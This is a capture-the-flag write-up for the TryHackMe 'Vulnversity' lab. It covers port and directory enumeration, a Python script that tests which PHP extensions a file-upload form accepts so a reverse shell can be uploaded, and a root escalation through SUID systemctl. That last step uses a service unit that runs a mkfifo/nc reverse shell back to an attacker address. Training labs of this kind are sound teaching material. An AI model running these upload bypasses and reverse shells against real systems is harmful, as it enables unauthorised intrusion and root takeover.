Vulnversity (THM)

TryHackMe - Vulnversity Write-Up

topics: Web application attacks, outdated/compromised configurations, Linux privilege escalation (SUID)

  1. Enumeration

  2. Local Privilege Escalation

  3. Root Privilege Escalation

Enumeration

initial nmap scan ./autonmap.sh $ip Basic

We have six ports open. Navigating to port 3333 reveals a website entitled "Vulnversity." Lets enumerate the website directories.

python3 dirsearch.py -u 10.10.186.73:3333 -e php,html,txt

dirsearch reveals six hidden directories, standard for the most part aside from the directory internal. Navigating to this page reveals a location to upload files.

The extension loaded on the page ends in .php so we can assume it accepts PHP files.

Local Privilege Escalation

We can write a script to test which PHP extensions are allowed.

#!/usr/bin/env python

import requests, os

ip = "10.10.186.73"
url = f"http://{ip}:3333/internal/index.php" 
old_file = "/root/shell.php" 

file = "/root/shell"
extensions = [
	".php",
	".php3",
	".php4",
	".php5",
	".phtml",
]

for ext in extensions:

	new_file = file + ext 						# forms which extension of the reverse shell works
	os.rename(old_file, new_file)			#renames the file after testing

	files = {"file": open(new_file, "rb")}	
	r = requests.post(url, files=files)

	if "Extension not allowed" in r.text:
		print(f"{ext} not allowed")
	else:
		print(f"{ext} is allowed")	

	old_file = new_file								#resets the file name after resetting from os.rename

From the script, we can see that the site accepts .phtml files. We can use the native Kali PHP reverse shell and rename it phtml.

Execute the shell and listen with nc

Brute forcing with burpsuite:

alt tool: 
https://github.com/asciimoo/wuzz
 
once the browser gets a CA certificate from Burp, it has the capability to intercept all traffic over HTTPS, 
Burp lists on 127.0.0.1 so the browser traffic must be manually configured to be redirected on localhost
Intruder takes wordlist payloads to guess which files are allowed
upload random .php file and delete content-disposition until the file name between special character
the permitted file extension will have a different length than the others as it omits the error message attached. (phtml)

Root Privilege Escalation

Lets stabilize the shell with python -c 'import pty; pty.spawn("/bin/bash")' and check for sudo permissions. sudo -l came up empty so instead I listed all SUID files

find / -perm /4000 -type f -exec ls -lda {} \; 2>/dev/null

/bin/systemctl, the binary file for systemctl (which controls all system daemons, the services on the OS) is set to SUID. Which will allow us the control of the program that oversees all other programs. Target system allows any logged in user to create a system service and run it as root

Using gtfobins and a few tweaks, we're able to create a reverse shell. 

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.18.145 443 >/tmp/f"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
PreviousMr. Robot (THM)NextAcademy (HTB)

Last updated